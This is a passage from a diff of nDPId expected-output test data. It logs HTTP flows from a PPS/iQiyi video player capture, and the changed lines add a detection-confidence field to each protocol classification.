{"hostname":"msg.71.am","url":"msg.71.am\/cp2.gif?a=4e3ae415a584748ac9aa31628f39d1e8&ai=&as=1:2:1|2&av=4.10.004&b=204076701&c=6&ct=5000000926795&d=158&di=&dp=71000001&e=512ab77de7f67d49f24d3511778220d0&ec=&em=&fi=&g=0&l=MTE4LjE2My44Ljkw&mk=&nw=&od=5000000856344&oi=&p=a&pp=&rc=&rd=&ri=&s=1467353139057&sh=&sq=&sw=&t=sp&u=0_aaoefdtqgfdepxc2tnv3piucgcb4eofn&v=500494600&vv=5.2.15.2240&x=&y=qc_100001_100140","code":0,"content_type":"","user_agent":"Mozilla\/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident\/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)\/QY-Player-Windows\/2.0.102"}}
 00632{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1011,"source":"pps.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":2,"flow_last_seen":1467353140677,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":194,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":194,"pkt_l4_len":160,"ts_msec":1467353140677,"pkt":"ABxCjnAxTF4M6gNlCABFAAC0b19AADMGyurKbA7dwKhzCABQxSpsAhW90liKZlAYABAfBgAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuNC43DQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA1OjQwIEdNVA0KQ29udGVudC1UeXBlOiB0ZXh0L2h0bWwNCkNvbnRlbnQtTGVuZ3RoOiAwDQpDb25uZWN0aW9uOiBjbG9zZQ0KDQo="}
 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1012,"source":"pps.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353140709,"flow_last_seen":1467353140709,"flow_idle_time":7440000,"flow_min_l4_payload_len":890,"flow_max_l4_payload_len":890,"flow_tot_l4_payload_len":890,"flow_avg_l4_payload_len":890,"midstream":1,"ts_msec":1467353140709,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.219","src_port":50473,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 01633{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1012,"source":"pps.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":1,"flow_last_seen":1467353140709,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":944,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":944,"pkt_l4_len":910,"ts_msec":1467353140709,"pkt":"TF4M6gNlABxCjnAxCABFAAOiA\/BAAIAG5m3AqHMIymwO28UpAFCvhj83b730NFAYAQRULwAAR0VUIC9jb3JlP3Q9MSZyZXNldD0wJnZmcm10cD0xJnRtMT0mdG0yPTAmdG0yMT0wJnRtMjI9MCZ0bTIzPTAmdG0yND0wJnRtMz0xMTcmdG0zMT0wJnRtMzI9NDcmdG0zMz03OCZ0bTM0PTEmdG00PTEzNyZ0bTQxPTAmdG00Mj0xNiZ0bTQzPTEyNSZ0bTQ0PTImdG01PTE2NSZ0bTUxPTAmdG01Mj0wJnRtNTM9MCZ0bTU0PTEwJnRtNj0mdG02Mj0wJnRtNjM9MCZ0bTc9MCZ0bTcxPTAmdG03Mj0wJnRtNzM9MCZ0bTg9MCZ0bTgxPTAmdG04Mj0wJnRtODM9MCZ0bTk9OTE2JnRtOTI9MTYmdG05Mz02MiZjaGlwaWQ9SW50ZWwlMjhSJTI5JTIwQ29yZSUyOFRNJTI5JTIwaTUlMkQyNTU3TSUyMENQVSUyMCU0MCUyMDElMkU3MEdIeiZyYT0yJmlzaGNkbj0yJnBmPTIwMSZwPTExJnAxPTExNCZwMj0zMDAwJnNka3RwPTEmYzE9NiZyPTUwMDQ5NDYwMCZhaWQ9NTAyOTU5OTAwJnU9YWFvZWZkdHFnZmRlcHhjMnRudjNwaXVjZ2NiNGVvZm4mcHU9Jm9zPXdpbmRvd3Mmdj01JTJFMiUyRTE1JTJFMjI0MCZrcnY9MiUyRTAlMkUxMDImZHQ9Jmh1PS0xJnJuPTE0NjczNTMxNDAmaXNsb2NhbD0wJmFzPWQxOWY2NDA0N2I2NDFjZDZmZjA5NmIwNGZiMmEzMGI1JnZlPTNjYzBjOGZhMzcyNjI1ZTY0MTQzMTQ0ODE2ZjNlOTY4JnBlPWM5NWQ5OTJlMjk4NTZkYzg0ZjJlOTkwN2EyZTRiMjgyJnZmcm09JmNobD0maGNkbnY9MTAuMC4wLjI5MyZ0cGNkPTAmaXNkcm09MSZodD0wIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBRWS1QbGF5ZXItV2luZG93cy8yLjAuMTAyDQpIb3N0OiBtc2cuNzEuYW0NCkFjY2VwdDogKi8qDQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXAsIGRlZmxhdGUNCnF5aWQ6YWFvZWZkdHFnZmRlcHhjMnRudjNwaXVjZ2NiNGVvZm4NCnF5cGlkOl8yMDEyDQpxeXBsYXRmb3JtOjAtMg0KDQo="}
-01437{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1012,"source":"pps.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353140709,"flow_last_seen":1467353140709,"flow_idle_time":7440000,"flow_min_l4_payload_len":890,"flow_max_l4_payload_len":890,"flow_tot_l4_payload_len":890,"flow_avg_l4_payload_len":890,"midstream":1,"ts_msec":1467353140709,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.219","src_port":50473,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"msg.71.am","url":"msg.71.am\/core?t=1&reset=0&vfrmtp=1&tm1=&tm2=0&tm21=0&tm22=0&tm23=0&tm24=0&tm3=117&tm31=0&tm32=47&tm33=78&tm34=1&tm4=137&tm41=0&tm42=16&tm43=125&tm44=2&tm5=165&tm51=0&tm52=0&tm53=0&tm54=10&tm6=&tm62=0&tm63=0&tm7=0&tm71=0&tm72=0&tm73=0&tm8=0&tm81=0&tm82=0&tm83=0&tm9=916&tm92=16&tm93=62&chipid=Intel%28R%29%20Core%28TM%29%20i5%2D2557M%20CPU%20%40%201%2E70GHz&ra=2&ishcdn=2&pf=201&p=11&p1=114&p2=3000&sdktp=1&c1=6&r=500494600&aid=502959900&u=aaoefdtqgfdepxc2tnv3piucgcb4eofn&pu=&os=windows&v=5%2E2%2E15%2E2240&krv=2%2E0%2E102&dt=&hu=-1&rn=1467353140&islocal=0&as=d19f64047b641cd6ff096b04fb2a30b5&ve=3cc0c8fa372625e64143144816f3e968&pe=c95d992e29856dc84f2e9907a2e4b282&vfrm=&chl=&hcdnv=10.0.0.293&tpcd=0&isdrm=1&ht=0","code":0,"content_type":"","user_agent":"QY-Player-Windows\/2.0.102"}}
+01463{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1012,"source":"pps.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353140709,"flow_last_seen":1467353140709,"flow_idle_time":7440000,"flow_min_l4_payload_len":890,"flow_max_l4_payload_len":890,"flow_tot_l4_payload_len":890,"flow_avg_l4_payload_len":890,"midstream":1,"ts_msec":1467353140709,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.219","src_port":50473,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"msg.71.am","url":"msg.71.am\/core?t=1&reset=0&vfrmtp=1&tm1=&tm2=0&tm21=0&tm22=0&tm23=0&tm24=0&tm3=117&tm31=0&tm32=47&tm33=78&tm34=1&tm4=137&tm41=0&tm42=16&tm43=125&tm44=2&tm5=165&tm51=0&tm52=0&tm53=0&tm54=10&tm6=&tm62=0&tm63=0&tm7=0&tm71=0&tm72=0&tm73=0&tm8=0&tm81=0&tm82=0&tm83=0&tm9=916&tm92=16&tm93=62&chipid=Intel%28R%29%20Core%28TM%29%20i5%2D2557M%20CPU%20%40%201%2E70GHz&ra=2&ishcdn=2&pf=201&p=11&p1=114&p2=3000&sdktp=1&c1=6&r=500494600&aid=502959900&u=aaoefdtqgfdepxc2tnv3piucgcb4eofn&pu=&os=windows&v=5%2E2%2E15%2E2240&krv=2%2E0%2E102&dt=&hu=-1&rn=1467353140&islocal=0&as=d19f64047b641cd6ff096b04fb2a30b5&ve=3cc0c8fa372625e64143144816f3e968&pe=c95d992e29856dc84f2e9907a2e4b282&vfrm=&chl=&hcdnv=10.0.0.293&tpcd=0&isdrm=1&ht=0","code":0,"content_type":"","user_agent":"QY-Player-Windows\/2.0.102"}}
 00640{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1013,"source":"pps.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":2,"flow_last_seen":1467353140720,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":199,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":199,"pkt_l4_len":165,"ts_msec":1467353140720,"pkt":"ABxCjnAxTF4M6gNlCABFAAC5F1lAADMGIt3KbA7swKhzCABQxSvXmoUy4BpnKlAYACB7oAAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuOC4wDQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA1OjQwIEdNVA0KQ29udGVudC1UeXBlOiBpbWFnZS9naWYNCkNvbnRlbnQtTGVuZ3RoOiAwDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQoNCg=="}
 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1014,"source":"pps.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353140755,"flow_last_seen":1467353140755,"flow_idle_time":7440000,"flow_min_l4_payload_len":602,"flow_max_l4_payload_len":602,"flow_tot_l4_payload_len":602,"flow_avg_l4_payload_len":602,"midstream":1,"ts_msec":1467353140755,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"101.227.32.39","src_port":50476,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 01251{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1014,"source":"pps.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":1,"flow_last_seen":1467353140755,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":656,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":656,"pkt_l4_len":622,"ts_msec":1467353140755,"pkt":"TF4M6gNlABxCjnAxCABFAAKCA\/NAAIAGOsjAqHMIZeMgJ8UsAFDdytkdPM+rpVAY\/\/BCUgAAR0VUIC92aS81MDA0OTQ2MDAvNTYyZTI2Y2FlZDU2OTU5MDAyMTJlYjMyNTkwNzBmOGEvP3NyYz0xXzExXzExNCBIVFRQLzEuMQ0KSG9zdDogY2FjaGUudmlkZW8uaXFpeWkuY29tDQpDYWNoZS1Db250cm9sOiBuby1jYWNoZQ0KQ29va2llOiBwcHNfY2xpZW50X3ZlcjI9NS4yLjE1LjIyNDA7IFQwMDQwND00ZTNhZTQxNWE1ODQ3NDhhYzlhYTMxNjI4ZjM5ZDFlODsgX3Bwc19pdmk9Vms0OU1UWXdOVEExTGFXL3BQbWhSejgvUDZUYXBFZW11RDgvcE0rd1pqOHRwTFd4M3pnd3Bsby9wR2FvY1NaV1VEMHhKbFpEUFQ4L1B6OCtwTFd4M3pnd3Bsby9wR2FvY1NaV1NqMHRNU1pXVXoxV0psWkVQU1pXVkZ0QlhUMHlNVGMxSmxaTlBTWldWajAxTGpJdU1UVXVNakkwTUNaV1ZUMW9kSFJ3T2k4dmQzZDNMbWx4YVhscExtTnZiUzkyWHpFNWNuSnNkblY0YkdjdWFIUnRiQT09OyBRQzAwNj11NTQ5dnB6MTBsOWZrYXR1bTRhbHc0YnA7IFFDMDA4PTE0NjY2NDU4MTYuMTQ2NjY0NTgxNi4xNDY2NjQ1ODE2LjE7IEhtX2x2dF81M2I3Mzc0YTYzYzM3NDgzZTVkZDk3ZDc4ZDliYjM2ZT0xNDY2NjQ1ODE3OyBRQzAwNT1hYW9lZmR0cWdmZGVweGMydG52M3BpdWNnY2I0ZW9mbg0KDQo="}
-00793{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1014,"source":"pps.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353140755,"flow_last_seen":1467353140755,"flow_idle_time":7440000,"flow_min_l4_payload_len":602,"flow_max_l4_payload_len":602,"flow_tot_l4_payload_len":602,"flow_avg_l4_payload_len":602,"midstream":1,"ts_msec":1467353140755,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"101.227.32.39","src_port":50476,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"cache.video.iqiyi.com","url":"cache.video.iqiyi.com\/vi\/500494600\/562e26caed5695900212eb3259070f8a\/?src=1_11_114","code":0,"content_type":"","user_agent":""}}
+00819{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1014,"source":"pps.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353140755,"flow_last_seen":1467353140755,"flow_idle_time":7440000,"flow_min_l4_payload_len":602,"flow_max_l4_payload_len":602,"flow_tot_l4_payload_len":602,"flow_avg_l4_payload_len":602,"midstream":1,"ts_msec":1467353140755,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"101.227.32.39","src_port":50476,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"cache.video.iqiyi.com","url":"cache.video.iqiyi.com\/vi\/500494600\/562e26caed5695900212eb3259070f8a\/?src=1_11_114","code":0,"content_type":"","user_agent":""}}
 01816{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1015,"source":"pps.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":2,"flow_last_seen":1467353140794,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1078,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1078,"pkt_l4_len":1044,"ts_msec":1467353140794,"pkt":"ABxCjnAxTF4M6gNlCABFAAQovhBAADEGzgRl4yAnwKhzCABQxSw8z6ul3crbd1AQPSRKcgAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54DQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA1OjQwIEdNVA0KQ29udGVudC1UeXBlOiB0ZXh0L2h0bWw7IGNoYXJzZXQ9dXRmLTgNClRyYW5zZmVyLUVuY29kaW5nOiBjaHVua2VkDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQpFeHBpcmVzOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA1OjM5IEdNVA0KQ2FjaGUtQ29udHJvbDogbm8tY2FjaGUNCkFjY2Vzcy1Db250cm9sLUFsbG93LUNyZWRlbnRpYWxzOiB0cnVlDQoNCmQ0OQ0KeyJjblByZW1UaW1lIjowLCJlZGl0b3JJbmZvIjoiIiwidmlkZW9RaXB1SWQiOjUwMDQ5NDYwMCwicmV3YXJkQWxsb3dlZCI6MCwibnVybCI6IiIsInN1cElkIjowLCJvbmxpbmVTdGF0dXMiOjEsImR0eXBlIjozLCJwdnUiOiIiLCJpc3N1ZVRpbWUiOjIwMTYwNjI1LCJ3cml0ZXIiOiIiLCJpc1RvcENoYXJ0IjowLCJxaXlpUGxheVN0cmF0ZWd5Ijoi5q+P5ZGo5LqU5ZGo5YWtMjA6MDAiLCJ1cCI6IjIwMTYtMDYtMjkgMTk6NDc6MDIiLCJpcExpbWl0IjowLCJ1biI6IiIsImV4Y2x1c2l2ZSI6MSwidm4iOiLjgIrkuIDmtL7mlrnoqIDjgItDLUJsb2Nr6ZW\/5rKZ6K+d44CK6ICB6KGX55qE5ZGz44CLIiwicHR1cmwiOiIiLCJzdGFydFRpbWUiOi0xLCJzdCI6MjAwLCJ0eSI6MjAxNjA2MjUsInNtIjowLCJzaG93Q2hhbm5lbElkIjo2LCJwb3Z1IjoiIiwicHJvZHVjZXJzIjoiIiwiZXRtIjoiIiwic3VwTmFtZSI6IiIsInR2RW5hbWUiOiIiLCJzYyI6MCwiY2MiOjAsIm1kb3duIjowLCJwYW5vIjp7InR5cGUiOjF9LCJtYWluQWN0b3JSb2xlcyI6W10sInN1YktleSI6IjIwNDA3NjcwMSIsImFwaWMiOiJodHRwOlwvXC9waWM1LnFpeWlwaWMuY29tXC9pbWFnZVwvMjAxNjA2MjVcL2Q3XC81OVwvdl8xMTA1ODM2NjZfbV82MDEuanBnIiwiZXMiOjEsInByb2R1Y2VyIjoiIiwiZW5kVGltZSI6LTEsImF1IjoiaHR0cDpcL1wvd3d3LmlxaXlpLmNvbVwvdl8xOXJybGpmM2hnLmh0bWwiLCJjaXJjbGUiOnsidHlwZSI6MiwiaWQiOjIwNQ=="}
 01816{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1016,"source":"pps.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":3,"flow_last_seen":1467353140794,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1078,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1078,"pkt_l4_len":1044,"ts_msec":1467353140794,"pkt":"ABxCjnAxTF4M6gNlCABFAAQovhFAADEGzgNl4yAnwKhzCABQxSw8z6+l3crbd1AQPSTsVQAANDczOTQ3fSwiaXNEaXNwbGF5Q2lyY2xlIjoxLCJwYXlNYXJrIjowLCJwbGMiOnsiNCI6eyJjb2EiOjEsImRvd25BbGQiOjF9LCIxMCI6eyJjb2EiOjEsImRvd25BbGQiOjF9LCI1Ijp7ImNvYSI6MSwiZG93bkFsZCI6MX0sIjExIjp7ImNvYSI6MSwiZG93bkFsZCI6MX0sIjEyIjp7ImNvYSI6MSwiZG93bkFsZCI6MX0sIjciOnsiY29hIjoxLCJkb3duQWxkIjoxfSwiMTgiOnsiY29hIjoxLCJkb3duQWxkIjoxfSwiMTMiOnsiY29hIjoxLCJkb3duQWxkIjoxfSwiMTQiOnsiY29hIjoxLCJkb3duQWxkIjoxfSwiOCI6eyJjb2EiOjEsImRvd25BbGQiOjF9LCIxIjp7ImNvYSI6MSwiZG93bkFsZCI6MX0sIjkiOnsiY29hIjoxLCJkb3duQWxkIjoxfSwiNiI6eyJjb2EiOjEsImRvd25BbGQiOjF9LCIxNiI6eyJjb2EiOjEsImRvd25BbGQiOjF9LCIxNSI6eyJjb2EiOjEsImRvd25BbGQiOjF9LCIzIjp7ImNvYSI6MSwiZG93bkFsZCI6MX0sIjE3Ijp7ImNvYSI6MSwiZG93bkFsZCI6MX0sIjIiOnsiY29hIjoxLCJkb3duQWxkIjoxfSwiMjEiOnsiY29hIjoxLCJkb3duQWxkIjoxfSwiMTkiOnsiY29hIjoxLCJkb3duQWxkIjoxfSwiMjAiOnsiY29hIjoxLCJkb3duQWxkIjoxfX0sIm50dmQiOjAsInR2Rm9jdXNlIjoi6ZW\/5rKZ6K+d44CK6ICB6KGX55qE5ZGz44CLIiwiY1R5cGUiOjcsInFpeWlQcm9kdWNlZCI6MSwidm90ZXMiOltdLCJhbGJ1bVFpcHVJZCI6NTAwNDk0NjAwLCJjYXRlZ29yeUtleXdvcmRzIjoi57u86Im6LDUwMDQ5NDYwMCwwLGh0dHA6XC9cL2xpc3QuaXFpeWkuY29tXC93d3dcLzZcLy0tLS0tLS0tLS0tLS0tLS0tLS5odG1sIOWGheWcsCwxNTEsMSxodHRwOlwvXC9saXN0LmlxaXlpLmNvbVwvd3d3XC82XC8xNTEtLS0tLS0tLS0tLS0tLS0tLS0uaHRtbCDlhbblroMsMTYxLDIsaHR0cDpcL1wvbGlzdC5pcWl5aS5jb21cL3d3d1wvNlwvLTE2MS0tLS0tLS0tLS0tLS0tLS0tLmh0bWwg5q2M6IieLDIxMjEsMixodHRwOlwvXC9saXN0LmlxaXlpLmNvbVwvd3d3XC82XC8tMjEyMS0tLS0tLS0tLS0tLQ=="}
 00640{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1019,"source":"pps.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":2,"flow_last_seen":1467353140888,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":199,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":199,"pkt_l4_len":165,"ts_msec":1467353140888,"pkt":"ABxCjnAxTF4M6gNlCABFAAC5fz1AADMGuwnKbA7bwKhzCABQxSlvvfQ0r4ZCsVAYADyHfQAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuNC43DQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA1OjQwIEdNVA0KQ29udGVudC1UeXBlOiB0ZXh0L2h0bWwNCkNvbnRlbnQtTGVuZ3RoOiAwDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQoNCg=="}
 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1020,"source":"pps.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353141138,"flow_last_seen":1467353141138,"flow_idle_time":7440000,"flow_min_l4_payload_len":560,"flow_max_l4_payload_len":560,"flow_tot_l4_payload_len":560,"flow_avg_l4_payload_len":560,"midstream":1,"ts_msec":1467353141138,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.219","src_port":50477,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 01193{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1020,"source":"pps.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":1,"flow_last_seen":1467353141138,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":614,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":614,"pkt_l4_len":580,"ts_msec":1467353141138,"pkt":"TF4M6gNlABxCjnAxCABFAAJYBBhAAIAG54\/AqHMIymwO28UtAFDtOXdacCs02FAYAQQdugAAR0VUIC9jb3JlP3Q9MTEmY3Q9YWRlbmQmcmVzZXQ9MCZyYT0yJnBmPTIwMSZwPTExJnAxPTExNCZwMj0zMDAwJnNka3RwPTEmYzE9NiZyPTUwMDQ5NDYwMCZhaWQ9NTAyOTU5OTAwJnU9YWFvZWZkdHFnZmRlcHhjMnRudjNwaXVjZ2NiNGVvZm4mcHU9Jm9zPXdpbmRvd3Mmdj01JTJFMiUyRTE1JTJFMjI0MCZrcnY9MiUyRTAlMkUxMDImZHQ9Jmh1PS0xJnJuPTE0NjczNTMxNDAmaXNsb2NhbD0wJmFzPWQxOWY2NDA0N2I2NDFjZDZmZjA5NmIwNGZiMmEzMGI1JnZlPTNjYzBjOGZhMzcyNjI1ZTY0MTQzMTQ0ODE2ZjNlOTY4JnBlPWM5NWQ5OTJlMjk4NTZkYzg0ZjJlOTkwN2EyZTRiMjgyJnZmcm09JmNobD0maGNkbnY9MTAuMC4wLjI5MyZ0cGNkPTAmaXNkcm09MSZodD0wIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBRWS1QbGF5ZXItV2luZG93cy8yLjAuMTAyDQpIb3N0OiBtc2cuNzEuYW0NCkFjY2VwdDogKi8qDQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXAsIGRlZmxhdGUNCnF5aWQ6YWFvZWZkdHFnZmRlcHhjMnRudjNwaXVjZ2NiNGVvZm4NCnF5cGlkOl8yMDEyDQpxeXBsYXRmb3JtOjAtMg0KDQo="}
-01107{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1020,"source":"pps.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353141138,"flow_last_seen":1467353141138,"flow_idle_time":7440000,"flow_min_l4_payload_len":560,"flow_max_l4_payload_len":560,"flow_tot_l4_payload_len":560,"flow_avg_l4_payload_len":560,"midstream":1,"ts_msec":1467353141138,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.219","src_port":50477,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"msg.71.am","url":"msg.71.am\/core?t=11&ct=adend&reset=0&ra=2&pf=201&p=11&p1=114&p2=3000&sdktp=1&c1=6&r=500494600&aid=502959900&u=aaoefdtqgfdepxc2tnv3piucgcb4eofn&pu=&os=windows&v=5%2E2%2E15%2E2240&krv=2%2E0%2E102&dt=&hu=-1&rn=1467353140&islocal=0&as=d19f64047b641cd6ff096b04fb2a30b5&ve=3cc0c8fa372625e64143144816f3e968&pe=c95d992e29856dc84f2e9907a2e4b282&vfrm=&chl=&hcdnv=10.0.0.293&tpcd=0&isdrm=1&ht=0","code":0,"content_type":"","user_agent":"QY-Player-Windows\/2.0.102"}}
+01133{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1020,"source":"pps.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353141138,"flow_last_seen":1467353141138,"flow_idle_time":7440000,"flow_min_l4_payload_len":560,"flow_max_l4_payload_len":560,"flow_tot_l4_payload_len":560,"flow_avg_l4_payload_len":560,"midstream":1,"ts_msec":1467353141138,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.219","src_port":50477,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"msg.71.am","url":"msg.71.am\/core?t=11&ct=adend&reset=0&ra=2&pf=201&p=11&p1=114&p2=3000&sdktp=1&c1=6&r=500494600&aid=502959900&u=aaoefdtqgfdepxc2tnv3piucgcb4eofn&pu=&os=windows&v=5%2E2%2E15%2E2240&krv=2%2E0%2E102&dt=&hu=-1&rn=1467353140&islocal=0&as=d19f64047b641cd6ff096b04fb2a30b5&ve=3cc0c8fa372625e64143144816f3e968&pe=c95d992e29856dc84f2e9907a2e4b282&vfrm=&chl=&hcdnv=10.0.0.293&tpcd=0&isdrm=1&ht=0","code":0,"content_type":"","user_agent":"QY-Player-Windows\/2.0.102"}}
 00640{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1021,"source":"pps.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":2,"flow_last_seen":1467353141308,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":199,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":199,"pkt_l4_len":165,"ts_msec":1467353141308,"pkt":"ABxCjnAxTF4M6gNlCABFAAC5uEFAADMGggXKbA7bwKhzCABQxS1wKzTY7Tl5ilAYADfR4AAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuNC43DQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA1OjQwIEdNVA0KQ29udGVudC1UeXBlOiB0ZXh0L2h0bWwNCkNvbnRlbnQtTGVuZ3RoOiAwDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQoNCg=="}
 01637{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1022,"source":"pps.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":3,"flow_last_seen":1467353142534,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":946,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":946,"pkt_l4_len":912,"ts_msec":1467353142534,"pkt":"TF4M6gNlABxCjnAxCABFAAOkBEBAAIAG5grAqHMIymwO7MUnAFCB65f\/kZem+1AYQRL+yQAAR0VUIC9jcDIuZ2lmP2E9NGUzYWU0MTVhNTg0NzQ4YWM5YWEzMTYyOGYzOWQxZTgmYWk9JmFzPTE6MjM6MjN8NDUmYXY9NC4xMC4wMDQmYj0xODA5MzIzMDEmYz0zMSZjdD01MDAwMDAwOTI3NTU4JmQ9MjE3NSZkaT0mZHA9NzEwMDAwMDEmZT1jNDg4OWU2NGFkOWQ5ZWViOWZmNDM4OTEwODUwYzQ0MiZlYz0mZW09JmZpPSZnPTAmbD1NVEU0TGpFMk15NDRMamt3Jm1rPSZudz0mb2Q9NTAwMDAwMDg1ODg3NCZvaT0mcD1hJnBwPSZyYz0mcmQ9JnJpPSZzPTE0NjczNTMxNDIwNDQmc2g9JnNxPSZzdz0mdD0xcSZ1PTBfYWFvZWZkdHFnZmRlcHhjMnRudjNwaXVjZ2NiNGVvZm4mdj00Nzk1MzEwMDAmdnY9NS4yLjE1LjIyNDAmeD0meT1xY18xMDAwMDFfMTAwMTQwIEhUVFAvMS4xDQpBY2NlcHQtTGFuZ3VhZ2U6IHpoLUNODQpSZWZlcmVyOiBodHRwOi8vd3d3LmlxaXlpLmNvbS9jb21tb24vZmxhc2hwbGF5ZXIvMjA